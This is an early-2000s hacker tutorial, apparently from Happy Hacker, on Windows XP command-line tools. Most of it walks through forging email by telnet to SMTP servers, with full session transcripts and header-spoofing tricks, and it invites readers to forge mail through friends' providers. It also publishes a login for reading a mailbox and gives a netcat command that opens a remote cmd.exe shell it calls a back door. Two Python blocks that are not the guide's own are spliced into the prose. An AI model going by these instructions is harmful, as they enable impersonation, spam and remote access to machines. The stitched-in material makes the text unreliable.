
The key to doing amazing things with XP is as simple as D O S.

Yes, that's right, DOS as in MS-DOS, as in Microsoft Disk Operating System. Windows XP (as well as NT and 2000) comes
with two versions of DOS. Command.com is an old DOS version. Various versions of
command.com come with Windows 95, 98, SE, ME, Windows 3, and DOS-only operating
systems.

The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe.
Usually cmd.exe is better than command.com because it is easier to use, has more commands,
and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For
example, you can repeat a command by using the up arrow until you back up to the desired
command. Unlike bash, however, your DOS command history is erased whenever you shut down
cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won't run
right in cmd.exe will work in command.com.

****************
Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can
compare cmd.exe to bash if I want to. Nanny nanny nah nah.
****************

DOS is your number one Windows gateway to the Internet, and the open sesame to local area
networks. From DOS, without needing to download a single hacker program, you can do
amazingly sophisticated explorations and even break into poorly defended computers.

****************
You can go to jail warning: Breaking into computers is against the law if you do not have
permission to do so from the owner of that computer. For example, if your friend gives you
permission to break into her Hotmail account, that won't protect you because Microsoft owns
Hotmail and they will never give you permission.
****************

****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a
DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before
demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?

Click All Programs -> Accessories -> Command Prompt

That runs cmd.exe. You should see a black screen with white text on it, saying something like
this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS
prompt, it gives you a long list of commands. However, this list leaves out all the commands
hackers love to use. Here are some of those left-out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for Transmission Control Protocol/Internet Protocol. As you can guess from the name,
TCP/IP is the protocol suite the Internet runs on, together with the User Datagram Protocol (UDP).
So when you are connected to the Internet, you can try these commands against other Internet
computers. Most local area networks also use TCP/IP.

NetBIOS (Network Basic Input/Output System) is another protocol for communicating between
computers. It is often used by Windows computers, and by Unix/Linux-type computers
running Samba. You can often use NetBIOS commands over the Internet (carried inside
TCP/IP, so to speak). In many cases, however, NetBIOS commands will be blocked by
firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using
it. We will cover NetBIOS commands in the next Guide to XP Hacking.

How to Forge Email

Want a computer you can telnet into and mess around with, and not get into trouble no matter
what you do to it? I've set up my techbroker.com (206.61.52.33) with user xyz, password testtest
for you to play with. Here's how to forge email to xyz@techbroker.com using telnet. Start by
clicking Start --> Run --> command.com or cmd.exe and give the command:

C:\>telnet techbroker.com 25

(In Windows 98 or earlier, a box will pop up into which you put the port number, 25.)

Connecting To Techbroker.com

220 <techbroker.com> Service ready

Now you type in who you want the message to appear to come from:
helo santa@techbroker.com
Techbroker.com will answer:

250 <techbroker.com> host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:


data

354 Start mail input; end with <CRLF>.<CRLF>

Newbie note: <CRLF> just means hit return. In case you can't see that little period between the
<CRLF>s, what you do to end composing your email is to hit enter, type a period, then hit enter
again.

Anyhow, try typing:

This is a test.
.

250 Requested mail action okay, completed

quit

221 <techbroker.com> Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the message we just composed
looks like:

Status: R
X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date. However, you can make your
headers better by using a trick with the data command. After you give it, you can insert as many
headers as you choose. The trick is easier to show than explain:

220 <techbroker.com> Service ready
helo santa@northpole.org
250 <techbroker.com> host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed
data
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 <techbroker.com> Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word followed by a colon, then the
rest of the line, then press return. As soon as you write a line that doesn't begin this way, the rest of
what you type goes into the body of the email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up in the
header. Some mail servers would show both "from" addresses.
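The header rule and the envelope/header mismatch just described, as an added example that is not the guide's own code: it splits a constructed copy of the second session's DATA block the way the text says the server does (standard mail parsers actually end the headers at the first blank line, which this sample never contains), and flags that the "mail from:" sender and the header From disagree, the comparison a receiving server or spam filter makes to spot a forged sender.

```python
import re
from email.utils import parseaddr

# Constructed sample, modelled on the second telnet session in the text:
# the envelope sender given to "mail from:" and the DATA block that followed it.
ENVELOPE_FROM = "santa@northpole.com"
DATA_BLOCK = """from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
."""

# A header line, per the text's rule: one word, a colon, then the rest of the line.
HEADER_LINE = re.compile(r"^([A-Za-z][\w-]*):\s*(.*)$")


def split_data(data: str):
    """Split a DATA block into ([(name, value), ...], body). Every line from the top
    that matches HEADER_LINE is a header; the first line that does not starts the
    body, and everything after it is body. The lone '.' terminator is dropped."""
    headers, body = [], []
    in_headers = True
    for line in data.splitlines():
        if line == ".":
            break
        m = HEADER_LINE.match(line) if in_headers else None
        if m:
            headers.append((m.group(1).lower(), m.group(2)))
        else:
            in_headers = False
            body.append(line)
    return headers, "\n".join(body)


def envelope_mismatch(envelope_from: str, data: str):
    """Return (header_from_address, mismatch). mismatch is True when the domain in
    the header From differs from the domain of the envelope MAIL FROM; the envelope
    sender never appears in the headers, so this is the only place to compare them."""
    headers, _ = split_data(data)
    header_from = next((v for k, v in headers if k == "from"), "")
    _, header_addr = parseaddr(header_from)
    env_domain = envelope_from.rpartition("@")[2].lower()
    hdr_domain = header_addr.rpartition("@")[2].lower()
    return header_addr, env_domain != hdr_domain


if __name__ == "__main__":
    print(split_data(DATA_BLOCK))
    print(envelope_mismatch(ENVELOPE_FROM, DATA_BLOCK))
```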

You can forge email on techbroker.com within one strict limitation.
Your email has to go to someone at techbroker.com. If you can find any way to send email to
someone outside techbroker, let us know, because you will have broken our security, muhahaha!
Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet.
First, some of the people who read email on this account have gotten infected with viruses,
which in turn have sent viruses to this account. So your antivirus program will go nuts when
reading lots of the email here. To read *just* the email you forged, you will first want to find
out how many emails in total are in this account. Most of them will just be viruses. Yours will be
the last or almost the last (more viruses come in often) in the account.

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:

user xyz
+OK user is known

Then type in this:

pass testtest
+OK mail drop has 112 message(s)

OK, so do you want to make sure that message 112 is yours and not some virus? Here is how to
tell. Long messages are usually viruses. Yours, presumably, was short. Here is the command that
tells you how long the messages are: UIDL. The numbers will include the letters A, B, C, D, E and F
and look like this, with the number of the message in the left-hand column:

105 410F821D
106 0013EF7F
107 158D4208
108 099C70B4
109 3E4E611B
110 2A726505
111 69D74CB4

This is hexadecimal, the base 16 numbering scheme used by many things having to do with
computers. You don't have to do anything fancy to figure out what that hexadecimal number
means in order to identify your email, if you used common sense and kept it short.

In any case, if you use telnet to read an email that holds a virus, despite your antivirus program
acting nuts, it won't infect your computer so don't worry.

All that said, here's how to read email using telnet.

retr 1
+OK message follows
This is a test.

If you want to know all possible commands for using telnet on a POP email server, give this
command:

help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Of course you could use your own email client program to download email from this account,
and you have my permission to download and delete all the email you want as well as forge it.
However, doing it this way instead of via telnet is boring and most unhackerly.

Unless you use a weird online provider like AOL, you can use these same tricks to send and
receive your own email. Or you can forge email to a friend by telnetting to his or her online
provider's email sending computer(s). You may not be able to do this with any random email
server, but you may be surprised to find out how many will let you do this.

How to Use Win XP's Nslookup to Forge Email

With most online providers you need to get the exact name of their
email computer(s). Often it is simply mail.targetcomputer.com
(substitute the name of the online provider for targetcomputer). If
this doesn't work, you can find out the name of their email server
with the DOS nslookup program, which only runs from cmd.exe.
Here's an example:

C:\>nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

> set q=mx
> dimensional.com
Server: DNS1.wurld.net
Address: 206.61.52.11

dimensional.com MX preference = 5, mail exchanger = mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger = mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger = mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
dimensional.com nameserver = ns-1.dimensional.com
dimensional.com nameserver = ns-2.dimensional.com
dimensional.com nameserver = ns-3.dimensional.com
dimensional.com nameserver = ns-4.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
mx3.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.10
ns.dimensional.com internet address = 206.124.26.254
ns.dimensional.com internet address = 206.124.0.254
ns.dimensional.com internet address = 206.124.1.254
ns.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.32
ns.dimensional.com internet address = 206.124.0.30
ns.dimensional.com internet address = 206.124.0.25
ns.dimensional.com internet address = 206.124.0.15
ns.dimensional.com internet address = 206.124.0.21
ns.dimensional.com internet address = 206.124.0.9
ns-1.dimensional.com internet address = 206.124.26.254
ns-2.dimensional.com internet address = 209.98.32.54
ns-3.dimensional.com internet address = 206.124.1.254
ns-4.dimensional.com internet address = 206.124.0.254
>

The lines that tell you what computers will let you forge email to
people with @dimensional.com addresses are:

dimensional.com MX preference = 5, mail exchanger = mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger = mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger = mx3.dimensional.com

MX stands for mail exchange. The lower the preference number, the more they would like you to
use that address for email. If the server with the lowest number is too busy, then try another server.
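The MX preference rule just described, as an added example that is not the guide's own code: it parses a constructed copy of the nslookup output above (including the lines the console wrapped after "mail exchanger =") and lists the domain's mail exchangers in the order their preference values say they should be tried, with the glue address when nslookup printed one.

```python
import re

# Constructed sample, shaped like the nslookup output shown in the text, including
# the MX lines that the console wrapped right after "mail exchanger =".
NSLOOKUP_OUTPUT = """
dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
"""

MX_LINE = re.compile(r"^(\S+)\s+MX preference = (\d+), mail exchanger =\s*(\S*)$")
A_LINE = re.compile(r"^(\S+)\s+internet address = (\d+(?:\.\d+){3})$")


def parse_mx(output: str):
    """Return [(preference, exchanger, ip_or_None), ...] with the lowest preference
    (the server the domain most wants to receive on) first. An exchanger name that
    nslookup wrapped onto the following line is stitched back onto its MX record."""
    lines = [ln.strip() for ln in output.splitlines() if ln.strip()]
    records, addresses = [], {}
    i = 0
    while i < len(lines):
        m = MX_LINE.match(lines[i])
        if m:
            pref, host = int(m.group(2)), m.group(3).lower()
            if not host and i + 1 < len(lines):  # name was wrapped to the next line
                i += 1
                host = lines[i].lower()
            records.append((pref, host))
        else:
            a = A_LINE.match(lines[i])
            if a:  # glue record: remember the IP so it can be reported with the MX
                addresses[a.group(1).lower()] = a.group(2)
        i += 1
    ordered = sorted(records, key=lambda r: (r[0], r[1]))
    return [(p, h, addresses.get(h)) for p, h in ordered]


if __name__ == "__main__":
    for pref, host, ip in parse_mx(NSLOOKUP_OUTPUT):
        print(pref, host, ip)
```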

Sometimes when you ask about a mail server, nslookup will give you this kind of error message:

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to [207.217.120.202] timed-out

To get around this problem, you need to find out what the domain name servers for your target
online provider are. A good place to start looking is http://netsol.com/cgi-bin/whois/whois . If this
doesn't work, see http://happyhacker.org/HHA/fightback.shtml for how to find the domain
servers for any Internet address.

****************
Newbie note: A domain name server provides information on the names and numbers assigned to
computers on the Internet. For example, dns1.wurld.net and dns2.wurld.net contain information
on happyhacker.org, techbroker.com, securitynewsportal.com, thirdpig.com and sage-inc.com.
When you query dns1.wurld.net about other computers, it might have to go hunting for that
information from other name servers. That's why you might get a timed out failure.
***************

Once you know the domain servers for an online service, set one of
them for the server for your nslookup program. Here's how you do it:

C:\>nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

Now give the command:

> server 207.217.126.41
Default Server: ns1.earthlink.net
Address: 207.217.126.41

The next command should be:

> set q=mx
> earthlink.net
Server: ns1.earthlink.net
Address: 207.217.126.41

earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
earthlink.net nameserver = ns3.earthlink.net
earthlink.net nameserver = ns1.earthlink.net
earthlink.net nameserver = ns2.earthlink.net
mx00.earthlink.net internet address = 207.217.120.28
mx01.earthlink.net internet address = 207.217.120.29
mx02.earthlink.net internet address = 207.217.120.79
mx03.earthlink.net internet address = 207.217.120.78
mx04.earthlink.net internet address = 207.217.120.249
mx05.earthlink.net internet address = 207.217.120.31
mx06.earthlink.net internet address = 207.217.120.23
ns1.earthlink.net internet address = 207.217.126.41
ns2.earthlink.net internet address = 207.217.77.42
ns3.earthlink.net internet address = 207.217.120.43
>

Your own online service will usually not mind and may even be glad if you use telnet to read
your email. Sometimes a malicious person or faulty email program will send you a message that
is so screwed up that your email program can't download it. With telnet you can manually delete
the bad email. Otherwise tech support has to do it for you.

If you think about it, this ability to forge email is a huge temptation to spammers. How can your
online provider keep the bad guys from filling up a victim's email box with garbage? The first
time a bad guy tries this, probably nothing will stop him or her. The second time the online
provider might block the bad guy at the firewall, maybe call the bad guy's online provider and
kick him or her and maybe get the bad guy busted or sued.

**************
You can go to jail warning: Sending hundreds or thousands of junk
emails to bomb someone's email account is a felony in the US.
***************

***************
You can get sued warning: Spamming, where you send only one email to each person, but send
thousands or millions of emails, is borderline legal. However, spammers have been successfully
sued when they forge the email addresses of innocent people as senders of their spam.
****************

Now that you know how to read and write email with telnet, you
definitely have something you can use to show off with. Happy hacking!

Whoops, wait just one minute. If you want to be an advanced XP hacker, you need to learn how
to use netcat!

How to Use Netcat

Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a free program
written by Weld Pond and Hobbit, and available from many sites, for example
http://www.atstake.com/research/tools/#network_utilities . It is basically telnet on steroids. For
example, using netcat, you can set up a port -- also known as a back door, depending on your
motivation -- that will allow people to telnet into a DOS shell. Use this command:

C:\>nc -L -p 5000 -t -e cmd.exe

You can specify a different port number than 5000. Just make sure it doesn't conflict with
another port by checking with the netstat command. Then you and your friends, enemies and
random losers can either telnet in or netcat in with the command:

C:\>nc -v [ipaddress of target] [port]

Of course you will probably get hacked for setting up this port. However, if you set up a sniffer
to keep track of the action, you can turn this scary back door into a fascinating honeypot. For
example, you could run it on port 23 and watch all the hackers who attack with telnet hoping to
log in. With some programming you could even fake a unix-like login sequence and play some
tricks on your attackers.

For more on how to hack with telnet, see the Beginners Guide #8 at
http://www.happyhacker.org/gtmhh/begin11.shtml
